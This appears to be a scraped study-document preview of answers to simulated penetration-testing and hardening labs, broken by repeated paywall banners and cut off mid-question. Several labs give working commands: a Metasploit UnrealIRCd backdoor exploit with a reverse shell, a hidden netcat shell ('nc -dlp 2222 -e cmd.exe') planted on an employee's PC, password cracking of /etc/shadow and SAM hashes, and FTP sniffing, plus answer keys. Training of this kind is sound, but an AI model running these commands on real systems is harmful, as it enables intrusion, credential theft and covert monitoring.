Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Run a vulnerability scan for the network security appliance (NSA) (198.28.56.18) using
Security Evaluator on the taskbar.
•
Remediate the vulnerabilities found in the vulnerability report on the NSA.
o
Rename the cisco user account using the following parameters:
▪
Set a username of
your choice
.
▪
Set a password of
your choice
.
▪
Set the idle timeout to
15 minutes or less
.
▪
Set LAN access only for your user (no WAN access).
▪
Allow access to your user only from the ITAdmin workstation
(192.168.0.31).
•
Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1.
Run a Security Evaluator report as follows:
a.
From the taskbar, open Security Evaluator.
b.
Next to Local Machine, select the
Target
icon to select a new target.
c.
Select
IPv4 Address
.
d.
Enter
198.28.56.18
.
e.
Click
OK
.
f.
Select the
Status Run/Rerun Security Evaluation
icon to run the security
evaluation.
g.
Review the results to determine which issues you need to resolve on the
NSA.
2.
From the taskbar, open Chrome.
3.
Maximize Chrome for easier viewing.
4.
In the URL field, type
198.28.56.18
and press
Enter
.
5.
In the Security Appliance Configuration utility, enter
cisco
as the username.
6.
Enter
cisco
as the password.
7.
Select
Log In
.
8.
Rename the cisco user account as follows:
a.
From the Getting Started (Basic) page, select
Change Default Admin
Password and Add Users
.
b.
Select
Edit
for the cisco username.
c.
In the User Name field, enter the
username
you chose.
d.
Select
Check to Edit Password
.
e.
In the Enter Current Logged in Administrator Password field, enter
cisco
.
f.
In the New Password field, enter the
password
you choose.
g.
In the Confirm New Password field, enter the
password
to confirm the new
password.
h.
Enter the
idle timeout
.
i.
Click
Apply
.
9.
Edit user policies as follows:
a.
Under Edit User Policies, select
Login
to configure a login policy.
b.
Select
Deny Login from WAN Interface
.
c.
Click
Apply
.
10.
Define network access as follows:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
a.
Under Edit User Policies, select
By IP
to configure IP address restrictions for
login.
b.
Under Defined Addresses, select
Add
.
c.
In the Source Address Type field, make sure
IP Address
is selected.
d.
In the Network Address/IP Address field, enter
192.168.0.31
for ITAdmin.
e.
Click
Apply
.
f.
Select
Allow Login only from Defined Addresses
.
g.
Click
Apply
to close the dialog.
11.
Verify that all the issues were resolved using the Security Evaluator feature on the
ITAdmin computer as follows:
a.
From the taskbar, open Security Evaluator.
b.
In Security Evaluator, select
Status Run/Rerun Security Evaluation
icon to
rerun the security evaluation.
c.
Remediate any remaining issues.
QUESTION 15:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
You are the IT security administrator for a small corporate network.
You are performing vulnerability scans on your network. Mary is the
primary administrator for the network and the only person authorized
to perform local administrative actions. The company network security
policy requires complex passwords for all users. It is also required that
Windows Firewall is enabled on all workstations. Sharing personal
files is not allowed.
In this lab, your task is to:
•
Run a vulnerability scan for the Office2 workstation using the
Security Evaluator on the taskbar.
•
Remediate the vulnerabilities found in the vulnerability report on
Office2 as follows:
o
Rename the Administrator account.
o
Disable the Guest account.
o
Set the password for the Mary account to expire.
o
Require a strong password for the Mary account.
o
Unlock the Susan account.
o
Remove the Susan account from the Administrators
group.
o
Turn on Windows Firewall for all profiles.
o
Remove the file share on the MyMusic folder.
•
Re-run a vulnerability scan to make sure all of the issues are
resolved.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 6 minutes 49 seconds
Required Score: 100%
Task Summary
Required Actions
Remediate the Administrator account
Disable the Guest account
Remediate the Mary account
Hide Details
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Set a strong password (12 characters or more) for the Mary account
Remove Password Never Expires from the Mary account
Remediate the Susan account
Hide Details
Unlock the Susan account
Remove Susan from the Administrators group
Turn on the Windows Firewall feature for all profiles
Remove the C:\\MyMusic folder share
Explanation
In this lab, your task is to:
•
Run a vulnerability scan for the Office2 workstation using the Security Evaluator on the
taskbar.
•
Remediate the vulnerabilities found in the vulnerability report on Office2 as follows:
o
Rename the Administrator account.
o
Disable the Guest account.
o
Set the password for the Mary account to expire.
o
Require a strong password for the Mary account.
o
Unlock the Susan account.
o
Remove the Susan account from the Administrators group.
o
Turn on Windows Firewall for all profiles.
o
Remove the file share on the MyMusic folder.
•
Re-run a vulnerability scan to make sure all of the issues are resolved.
Complete this lab as follows:
1.
Run a Security Evaluator report as follows:
a.
From the taskbar, open Security Evaluator.
b.
Next to Local Machine, select the
Target
icon to select a new target.
c.
Select
Workstation
.
d.
From the Workstation drop-down list, select
Office2
as the target.
e.
Click
OK
.
f.
Select
Status Run/Rerun Security Evaluation
icon to run the security
evaluation.
g.
Review the results to determine which issues you need to resolve on Office2.
2.
From the top navigation tabs, select
Floor 1
.
3.
Under Office 2, select
Office2
.
4.
On Office2, right-click
Start
and select
Computer Management
.
5.
Expand
Local Users and Groups
.
6.
Select
Users
.
7.
Rename a user account as follows:
a.
Right-click
Administrator
and select
Rename
.
b.
Enter a new
name
and press
Enter
.
8.
Disable the Guest account as follows:
a.
Right-click
Guest
and select
Properties
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
b.
Select
Account is disabled
and then click
OK
.
9.
Set a new password as follows:
a.
Right-click
Mary
and select
Set Password
.
b.
Select
Proceed
.
c.
Enter a new
password
(12 characters or more).
d.
Confirm the new
password
and then click
OK
.
e.
Click
OK
.
Ideally, you should have created a policy that requires passwords with 12
characters or more.
10.
Set a password to expire as follows:
a.
Right-click
Mary
and select
Properties
.
b.
Deselect
Password never expires
.
c.
Select
User must change password at next logon
and then click
OK
.
11.
Unlock a user account and remove the user from a group as follows:
a.
Right-click
Susan
and select
Properties
.
b.
Deselect
Account is locked out
and then click
Apply
.
c.
Select the
Member of
tab.
d.
Select the
Administrators
.
e.
Select
Remove
.
f.
Click
OK
.
g.
Close Computer Management.
12.
Enable Windows Firewall for all profiles as follows:
a.
In the search field on the taskbar, enter
Control Panel
.
b.
Under Best match, select
Control Panel
.
c.
Select
System and Security
.
d.
Select
Windows Firewall
.
e.
Select
Turn Windows Firewall on or off
.
f.
Under Domain network settings, select
Turn on Windows Firewall
.
g.
Under Private network settings, select
Turn on Windows Firewall
.
h.
Under Public network settings, select
Turn on Windows Firewall
.
i.
Click
OK
.
j.
Close Windows Firewall.
13.
Remove a file share as follows:
a.
From the taskbar, open File Explorer.
b.
Browse to
C:\\MyMusic
.
c.
Right-click
MyMusic
and select
Properties
.
d.
Select the
Sharing
tab.
e.
Select
Advanced Sharing
.
f.
Deselect
Share this folder
.
g.
Click
OK
.
h.
Click
OK
.
14.
Use the Security Evaluator feature to verify that all of the issues on the ITAdmin
computer were resolved as follows:
a.
From the top navigation tabs, select
Floor 1
.
b.
Select
ITAdmin
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
c.
In Security Evaluator, select
Status refresh
to rerun the security evaluation.
d.
If you still see unresolved issues, select
Floor 1
, navigate to the Office2
workstation, and remediate any remaining issues.
QUESTION 16:
You are the IT security administrator for a small corporate network.
You perform vulnerability scans on your network. You need to verify
the security of your wireless network and your Ruckus wireless access
controller.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
In this lab, your task is to:
•
Run a vulnerability scan for the wireless access controller
(192.168.0.6) using Security Evaluator on the taskbar.
•
Remediate the vulnerabilities found in the vulnerability report for
the wireless access controller.
o
New Admin name:
your choice
o
New password:
your choice
o
Enable reporting of rogue devices for intrusion
prevention.
•
Rerun a vulnerability scan to make sure all of the issues are
resolved.
“
Access the wireless controller console through Google Chrome
on
http://192.168.0.6
with the admin name
admin
and the
password
password
.
”
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 53 seconds
Required Score: 100%
Task Summary
Required Actions
Change the default Admin username and password
Enable Intrusion Detection
Explanation
In this lab, your task is to:
•
Run a vulnerability scan for the wireless access controller (192.168.0.6) using Security
Evaluator on the taskbar.
•
Remediate the vulnerabilities found in the vulnerability report for the wireless access
controller.
o
New Admin name:
your choice
o
New password:
your choice
o
Enable reporting of rogue devices for intrusion prevention.
•
Re-run a vulnerability scan to make sure all of the issues are resolved.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Complete this lab as follows:
1.
Run a Security Evaluator report as follows:
a.
From the taskbar, open Security Evaluator.
b.
Next to Local Machine, select the
Target
icon to select a new target.
c.
Select
IPv4 Address
.
d.
Enter
192.168.0.6
for the wireless access controller.
e.
Click
OK
.
f.
Select the
Status Run/Rerun Security Evaluation
icon to run the security
evaluation.
g.
Review the results to determine which issues you need to resolve on the
wireless access controller.
2.
Change the admin username and password as follows:
a.
From the taskbar, open
Chrome
.
b.
Maximize Chrome for easier viewing.
c.
Type
192.168.0.6
and press
Enter
.
d.
Enter the
admin name
.
e.
Enter the
password
.
f.
Select
Login
.
g.
From the top, select the
Administer
tab.
h.
Make sure
Authenticate using the admin name and password
is selected.
i.
In the Admin Name field, enter the
username
you chose.
j.
In the Current Password field, enter the
password
.
k.
In the New Password field, enter the
password
you chose.
l.
In the Confirm New Password field, enter the new
password
.
m.
On the right, select
Apply
.
3.
Enable intrusion prevention as follows:
a.
Select the
Configure
tab.
b.
On the left, select
WIPS
.
c.
Under Intrusion Detection and Prevention, select
Enable report rogue
devices
.
d.
On the right, select
Apply
.
4.
Verify that all the issues were resolved using the Security Evaluator feature on the
ITAdmin computer as follows:
a.
From the taskbar, open Security Evaluator.
b.
In Security Evaluator, select
Status Run/Rerun Security Evaluation
icon to
rerun the security evaluation.
c.
Remediate any remaining issues.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 17:
You are an ethical hacker consultant working for CorpNet. CorpNet
wants you to discover weaknesses in their public-facing servers. From
outside of the CorpNet network, you are able to deploy a Metasploit
payload to one of their Windows servers named www3.corpnet.xyz.
You are determining whether the Windows patches are up to date or if
there is an unpatched vulnerability that could be exploited.
In this lab, your task is to:
•
Use the post/windows/gather/enum_patches exploit in Metasploit
to enumerate the Windows patches that are missing or
vulnerable.
•
Answer the question.
“
Metasploit has already been configured to exploit the payload that
was deployed to www3.corpnet.xyz. This Meterpreter payload has
already connected as session 1.
”
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Elapsed Time: 4 minutes 14 seconds
Required Score: 100%
Task Summary
Lab Questions
Configure and run the enum_patches exploit
Q1
Which Windows patches are missing?
Explanation
In this lab, your task is to
•
Use the post/windows/gather/enum_patches exploit in Metasploit to enumerate the
Windows patches that are missing or vulnerable.
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Metasploit Framework.
2.
At the prompt, type
use post/windows/gather/enum_patches
and press
Enter
to use
the enumerate patches exploit.
3.
Type
show options
and press
Enter
to show the exploit options.
Notice that the session option is absent.
4.
Type
set session 1
and press
Enter
to specify the session.
5.
Type
show options
and press
Enter
.
Notice that the session option has been set.
6.
Type
run
and press
Enter
to begin the exploit.
7.
In the top right, select
Answer Questions
.
8.
Answer the question.
9.
Select
Score Lab
.
Lab Questions:
1.
Which Windows patches are missing?
a.
KB2871997
b.
KB2928120
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 18:
You are an ethical hacker consultant working for CorpNet. CorpNet
wants you to discover weaknesses in their public-facing servers. From
outside of the CorpNet network, you have discovered one of their
Windows servers named www3.corpnet.xyz with an IP address of
198.28.1.3. You believe a Microsoft SQL server is installed on this
server, but it doesn't respond to the default TCP port of 1433.
In this lab, your task is to use the auxiliary/scanner/mssql/mssql_ping
exploit in Metasploit to determine which TCP port Microsoft SQL is
using.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 57 seconds
Required Score: 100%
Task Summary
Lab Questions
Configure and run the auxiliary/scanner/mssql/mssql_ping exploit
Q1
Which port is the Microsoft SQL Server using on www3.corpnet.xyz?
Explanation
In this lab, your task is to use the auxiliary/scanner/mssql/mssql_ping exploit in Metasploit to
determine which TCP port Microsoft SQL is using.
Complete this lab as follows:
1.
From the Favorites bar, open Metasploit Framework.
2.
At the prompt, type
use auxiliary/scanner/mssql/mssql_ping
and press
Enter
to use
the MSSQL Ping Utility exploit.
3.
Type
show options
and press
Enter
to show the exploit options.
Notice that the RHOSTS setting is absent.
4.
Type
set RHOSTS 198.28.1.3
and press
Enter
to specify the remote host.
5.
Type
show options
and press
Enter
to show the exploit options.
Notice that RHOSTS has been set.
6.
Type
exploit
and press
Enter
to begin the exploit.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
7.
In the top right, select
Answer Questions
.
8.
Answer the question.
9.
Select
Score Lab
.
Lab Questions:
1.
Which port is the Microsoft SQL Server using on www3.corpnet.xyz?
a.
1511
A.2.2 Pro Domain 2: Gain Access
QUESTION 1:
You are the IT security administrator for a small corporate network.
You've received a zip file that contains sensitive password-protected
files. You need to access these files. The zip file is located in the
home directory.
In this lab, your task is to use John the Ripper to:
•
Crack the root password on Support.
•
Crack the password of the protected.zip file in the home directory
on IT-Laptop.
“After John the Ripper cracks the password, it won’t crack it again.
The results are stored in the john.pot file.
”
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 7 minutes 7 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Crack the password to the Linux computer
Q1
What is the password for the Linux computer?
Crack the password to the zip file
Q2
What is the password for the rotected.zip file?
Explanation
In this lab, your task is to use John the Ripper to:
•
Crack the root password on Support.
•
Crack the password of the protected.zip file in the home directory on IT-Laptop.
Complete this lab as follows:
1.
Crack the root password on Support as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
cd /usr/share/john
and press
Enter
to change
directories to the folder containing the John the Ripper password file.
c.
Type
ls
and press
Enter
to list the files in the directory.
d.
Type
cat password.lst
and press
Enter
to view the password list. This is an
abbreviated list.
e.
Type
cd
and press
Enter
to go back to root.
f.
Type
john /etc/shadow
and press
Enter
to crack the Linux passwords.
Notice that the root password of 1worm4b8 was cracked.
g.
Type
john /etc/shadow
and press
Enter
to attempt to crack the Linux
passwords again.
Notice that it does not attempt to crack the password again. The cracked
password is already stored in the john.pot file.
h.
Type
cat ./.john/john.pot
and press
Enter
to view the contents of the
john.pot file.
i.
Type
john /etc/shadow --show
and press
Enter
as an alternate method of
viewing the previously cracked password.
j.
In the top right, select
Answer Questions
.
k.
In Terminal, find the
root password
and answer the question.
2.
Crack the password of the protected.zip file as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under IT Administration, select
IT-Laptop
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
c.
From the Favorites bar, open Terminal.
d.
At the prompt, type
ls
and press
Enter
to view the contents of the home
directory. Notice the protected.zip file you wish to crack.
e.
Type
zip2john protected.zip > ziphash.txt
and press
Enter
to copy the
hashes to a text file.
f.
Type
cat ziphash.txt
and press
Enter
to confirm that the hashes have been
copied.
g.
Type
john --format=pkzip ziphash.txt
and press
Enter
to crack the
password.
Notice that the password of p@ssw0rd was cracked.
h.
Type
john ziphash.txt --show
and press
Enter
to show the password.
i.
In the top right, select
Answer Questions
.
j.
In Terminal, find the
password
for the file and answer the question.
k.
Select
Score Lab
.
Lab Questions:
1.
1worm4b8
2.
p@ssw0rd
QUESTION 2:
While doing some penetration testing for your company, you captured
some password hashes. The password hashes are saved in the root
user's home directory /root/captured_hashes.txt. Now you want to
hack these passwords using a rainbow table. The password
requirements for your company are as follows:
•
The password must be 20 or more characters in length.
•
The password must include at least one upper and one
lowercase letter.
•
The password must have at least one of these special
characters: ! " # $ % & _ ' * @
•
All passwords are encrypted using a hash algorithm of either
md5 or sha1.
In this lab, your task is to:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Create md5 and sha1 rainbow tables using rtgen.
•
Sort the rainbow tables using rtsort.
•
Crack the hashes using rcrack. You must run rcrack on one
individual hash and run it on the hash file.
•
Answer the question.
“
The type of charset that can be used to create a rainbow table is
stored in the /usr/share/rainbowcrack/charset.txt file. This file can be
viewed using the
cat
command.
”
Your Performance
Your Score: 7 of 7 (100%)
Pass Status:
Pass
Elapsed Time: 6 minutes 37 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Create rainbow tables
Hide Details
rtgen md5 ascii-32xx
rtgen sha1 ascii-32xx
Sort the rainbow tables using rtsort
Crack the hash using rcrack . -l
Crack the hash using rcrack . -h
Q1
What is the password for hash 202cb962ac59075b964b07152d234b70?
Q2
What is the password for hash 400238780e6c41f8f790161e6ed4df3b?
Q3
What is the password for hash 89BF04763BF91C9EE2DDBE23D7B5C730BDD41FF2?
Explanation
In this lab, your task is to:
•
Create md5 and sha1 rainbow tables using rtgen.
•
Sort the rainbow tables using rtsort.
•
Cracked the hashes using rcrack. You must run rcrack on one individual hash as well as
running it on the hash file.
•
Answer the questions.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
rtgen md5 ascii-32-95 1 20 0 1000 1000 0
and press
Enter
to create
a md5 rainbow crack table.
3.
Type
rtgen sha1 ascii-32-95 1 20 0 1000 1000 0
and press
Enter
to create a sha1
rainbow crack table.
4.
Type
rtsort .
and press
Enter
to sort the rainbow table.
5.
Type
rcrack . -l /root/captured_hashes.txt
and press
Enter
to crack the password
contained in a hash file.
6.
Type
rcrack . -h
hash_value
and press
Enter
to crack the password contained in a hash.
7.
In the top right, select
Answer Questions
.
8.
Answer the questions.
9.
Select
Score Lab
.
Lab Questions:
1.
123
2.
MaryHad_A_Sm@ll_Lamb
3.
DisneyL@nd3
QUESTION 3:
You are the cypersecurity specialist for your company. You are
conducting a penetration test to see if anyone is using FTP against
company policy.
In this lab, your task is to capture FTP packets as follows:
•
Use Wireshark to capture packets for five seconds.
•
Filter for FTP packets.
•
Answer the questions.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Pass
Elapsed Time: 6 minutes 9 seconds
Required Score: 100%
Task Summary
Lab Questions
Q1
What is the name used to log into the FTP session?
Q2
What is the password used to log into the FTP site?
Q3
What is the name of the file downloaded during the FTP session?
Explanation
In this lab, your task is to capture FTP packets as follows:
•
Use Wireshark to capture packets for five seconds.
•
Filter for FTP packets.
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
Capture
packets
for five seconds.
5.
Select the
red box
to stop the Wireshark capture.
6.
In the Apply a display filter field, type
ftp
and press
Enter
.
7.
In the top right, select
Answer Questions
.
8.
Answer the questions.
9.
Select
Score Lab
.
Lab Questions:
3.
What is the name used to log into the FTP session?
a.
Admin
4.
What is the password used to log into the FTP site?
a.
P@ssword
5.
What is the name of the file downloaded during the FTP session?
a.
Usage.txt
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 4:
You work as the IT security administrator for a small corporate
network. The company president has received several emails that he
is wary of. He has asked you to determine whether they are
hazardous and handle them accordingly.
In this lab, your task is to:
•
Read each email and determine whether it is legitimate.
•
Delete any emails that are attempts at social engineering.
•
Keep any emails that are safe.
“
Hold your mouse over the embedded links to see the actual URL in
the status bar at the bottom of the screen.
”
Your Performance
Your Score: 8 of 8 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 40 seconds
Required Score: 100%
Task Summary
Required Actions
Delete the Microsoft Windows Update Center phishing email
Delete the Online Banking phishing email
Delete the Grandma Jacklin forwarded email hoax
Delete the Emily Smith spear phishing email
Delete the Sara Goodwin malicious attachment email
Delete the Grandma Jacklin forwarded email hoax
Delete the Joe Davis malicious attachment email
Delete the Executive Recruiting whaling email
Explanation
In this lab, delete each malicious email.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Email
Diagnosis
Action
Description
Microsoft
Windows
Update Center
New Service
Pack
Phishing
Delete
Notice the various spelling errors and
that the link does not direct you to a
Microsoft website.
Joe Davis
Re: Lunch
Today?
Malicious
Attachment
Delete
This email appears to be from a
colleague. However, why would he fail to
respond to your lunch question and send
you a random attachment in return?
Executive
Recruiting
Executive Jobs
Whaling
Delete
Whaling uses tailored information to
attack executives. Clicking the link could
install malware that would capture
sensitive company information.
Human
Resources
Ethics Video
Safe
Keep
While this email has an embedded link, it
is digitally signed, so you know it actually
comes from your Human Resources
department. In addition, if you hover
over the link, you see that it is a secure
link to the corporate web server.
Online
Banking
Department
Payment
Pending
Phishing
Delete
This is a carefully crafted attempt to get
your bank account information. Hover
over the link and notice that it does not
direct you to your credit union website,
but to an unknown IP address instead.
Grandma
Jacklin
FW: FW: FW:
Virus Attack
Warning
Hoax
Delete
Any email that asks you to forward it to
everyone you know is probably a hoax.
Emily Smith
Web Site
Update
Spear
Phishing
Delete
While this email appears to come from a
colleague, notice that the link points to an
executable file from a Russian domain
name. This probably is not a message a
real colleague would send. This file will
likely infect the computer with malware.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Sara Goodwin
Wow!!
Malicious
Attachment
Delete
Emails with attachments from random
people who address you as "Dear Friend"
are probably not safe.
Grandma
Jacklin
Free Airline
Tickets
Hoax
Delete
Any email that asks you to forward it to
everyone you know is probably a hoax,
even if the contents promise you a prize.
In addition, there is no way to know how
many people the email has been
forwarded to.
Human
Resources
IMPORTANT
NOTICE-Action
Required
Safe
Keep
While this email appears very urgent, it
doesn't ask you to click on anything or
run any attachments. It does inform you
that you need to go a website that you
should already know and make sure your
courses are complete.
Activities
Committee
Pumpkin
Contest
Safe
Keep
This email doesn't ask you to click on
anything or run any attachments.
Robert
Williams
Presentation
Safe
Keep
This email doesn't ask you to click on
anything or run any attachments.
QUESTION 5:
You are an ethical hacker consultant working for CorpNet. They want
you to discover weaknesses in their network. From outside the
CorpNet network, you used Zenmap and discovered that the
www_stage server located in CorpNet's DMZ is running an exploitable
application named UnrealIRCd. This allows you to set up a backdoor
using Metasploit.
In this lab, your task is to:
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
•
Create a backdoor on www_stage using Metasploit by exploiting
the UnrealIRCd application using the following information:
o
Search for Unreal exploits.
o
Use the exploit that allows Backdoor Command
Execution.
o
Configure the remote host (RHOST) with the
198.28.1.15 IP address; the same IP address as
www_stage.
o
Set the payload to the cmd/unix/reverse payload.
o
Verify that the local host (LHOST) was set to the
147.191.29.15 IP address (the same IP address as
Consult-Lap2).
o
Execute the exploit.
o
Read the contents of the text file in the /root directory.
•
Answer the question.
“
In Terminal, you can highlight the text and right-click it to copy and
paste the highlighted text to the cursor's location.
”
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 8 minutes 18 seconds
Required Score: 100%
Task Summary
Lab Questions
Create a backdoor on www_stage by exploiting the UrealIRDd application
Q1
What is the name of the new feature added to the tracking app on www_stage?
Explanation
In this lab, your task is to:
•
Create a backdoor on www_stage using Metasploit by exploiting the UnrealIRCd
application using the following information:
o
Search for Unreal exploits.
o
Use the exploit that allows Backdoor Command Execution.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
o
Configure the remote host (RHOST) with the 198.28.1.15 IP address; the
same IP address as www_stage.
o
Set the payload to the cmd/unix/reverse payload.
o
Verify that the local host (LHOST) was set to the 147.191.29.15 IP address; the
same IP address as Consult-Lap2.
o
Execute the exploit.
o
Read the contents of the text file in the /root directory.
•
Answer the question.
Complete this lab as follows:
1.
Search for UrealIRCd exploits and review the exploit information as follows:
a.
From the Favorites bar, open Metasploit Framework.
b.
At the prompt, type
search Unreal
and press
Enter
to search for any
UnrealIRCd exploits.
c.
Type
info exploit/unix/irc/unreal_ircd_3281_backdoor
and press
Enter
to
review the exploit information.
Notice that RHOST is required.
2.
Use the exploit/unix/irc/unreal_ircd_3281_backdoor exploit and configure the exploit's
RHOST IP address as follows:
a.
Type
use exploit/unix/irc/unreal_ircd_3281_backdoor
and press
Enter
to
use the exploit.
b.
Type
show options
and press
Enter
.
Notice the absence of the current setting for RHOST.
c.
Type
set RHOST 198.28.1.15
and press
Enter
to configure the remote host
setting.
d.
Type
show options
and press
Enter
to confirm that RHOST is set.
3.
Set the payload as follows:
a.
Type
show payloads
and press
Enter
to list available payloads.
b.
Type
set payload cmd/unix/reverse
and press
Enter
to specify the correct
payload.
c.
Type
show options
and press
Enter
to review the exploit's configuration.
Notice that LHOST is automatically set to the IP address for Consult-Lap2.
4.
Execute the exploit and examine the text file in the /root directory as follows:
a.
Type
exploit
and press
Enter
to execute the exploit.
b.
Type
ifconfig
and press
Enter
to confirm that the backdoor has been
established.
Notice the IP address is 198.28.1.15; the same IP address as www_stage.
c.
Type
pwd
and press
Enter
to confirm you are in the /root directory.
d.
Type
ls
and press
Enter
to list the files in the /root directory.
e.
Type
cat Staging_Features_CONFIDENTIAL.txt
and press
Enter
to review
the contents of a file that appears to contain sensitive information.
5.
In the top right, select
Answer Questions
.
6.
Answer the question.
7.
Select
Score Lab
.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Lab Questions:
1.
In Terminal, you can highlight the test.
2.
Right-click it to copy and paste the highlighted
text to the cursor’s location
.
QUESTION 6:
You are the IT security administrator for a small corporate
network. You suspect an employee is misusing a company computer
by downloading copyrighted music files at work and storing them on
an external drive. You notice that the employee has gone to lunch and
decide to use this opportunity to set up a backdoor access and to
investigate the external drive at a later time when the employee
connects the drive to the computer. You begin by installing netcat on
the employee's computer and adding the C:/netcat folder to the path
environment variable so that it can be run outside of the folder.
In this lab, your task is to:
•
Run netcat from a PowerShell window on Office1 as follows:
o
Execute netcat in detached mode so that it runs in the
background when the command prompt window is
closed.
o
Execute netcat in listen mode.
o
Configure netcat to listen for connections on port 2222.
o
Configure netcat to execute cmd.exe when a
connection is made.
•
Run netcat on IT-Laptop and connect to Office1 as follows:
o
Connect using the hostname or IP address.
o
Connect using port 2222.
•
Inspect the external hard drive (G: drive) for music and video
files.
“
The second task would be performed after the employee returned
from lunch and connected an external drive to Office1.
”
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 59 seconds
Required Score: 100%
Task Summary
Required Actions
Execute netcat on Office1 (listen mode)
Execute netcat on IT-Laptop (client mode)
Inspect external hard drive (G: drive)
Explanation
In this lab, your task is to:
•
Run netcat from a PowerShell window on Office1 using the following information:
o
Execute netcat in detached mode so that it runs in the background when the
command prompt window is closed.
o
Execute netcat in listen mode.
o
Configure netcat to listen for connections on port 2222.
o
Configure netcat to execute cmd.exe when a connection is made.
•
Run netcat on IT-Laptop and connect to Office1 using the following information:
o
Connect using the hostname or IP address.
o
Connect using port 2222.
•
Inspect the external hard drive (G: drive) for music and video files.
Complete this lab as follows:
1.
On Office1, run netcat from a PowerShell window as follows:
a.
Right-click
Start
and select
Windows Powershell (Admin)
.
b.
At the prompt, type
nc -dlp 2222 -e cmd.exe
and press
Enter
to start netcat
in listen mode.
c.
Close the PowerShell window so the employee doesn't see an open window.
2.
On IT-Laptop, run netcat to connect to Office1 as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under IT Administration, select
IT-Laptop
.
c.
From the Favorites bar, open Terminal.
d.
At the prompt, type
nc Office1 2222
and press
Enter
to start netcat in client
mode.
3.
Type
dir /s g:
and press
Enter
to inspect the G: drive.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
QUESTION 7:
As the cybersecurity specialist for your company, you're performing a
penetration test. As part of this test, you're checking to see if the
Security Account Manager (SAM) passwords from a Windows system
can be cracked using John the Ripper.
In this lab, your task is to crack the SAM passwords as follows:
•
On Office 1, use
pwdump7
to export the contents of the SAM to
SAMhash.txt. This machine has already been booted into a
recovery mode, allowing you to
use
Troubleshoot
>
Advanced
>
Command Prompt
to
access the SAM file.
•
Copy the exported file to the thumb drive (g: drive) and then
move the thumb drive to the IT-Laptop computer. After the
thumb drive is inserted, it is automatically mounted to
/media/root/ESD-USB/.
•
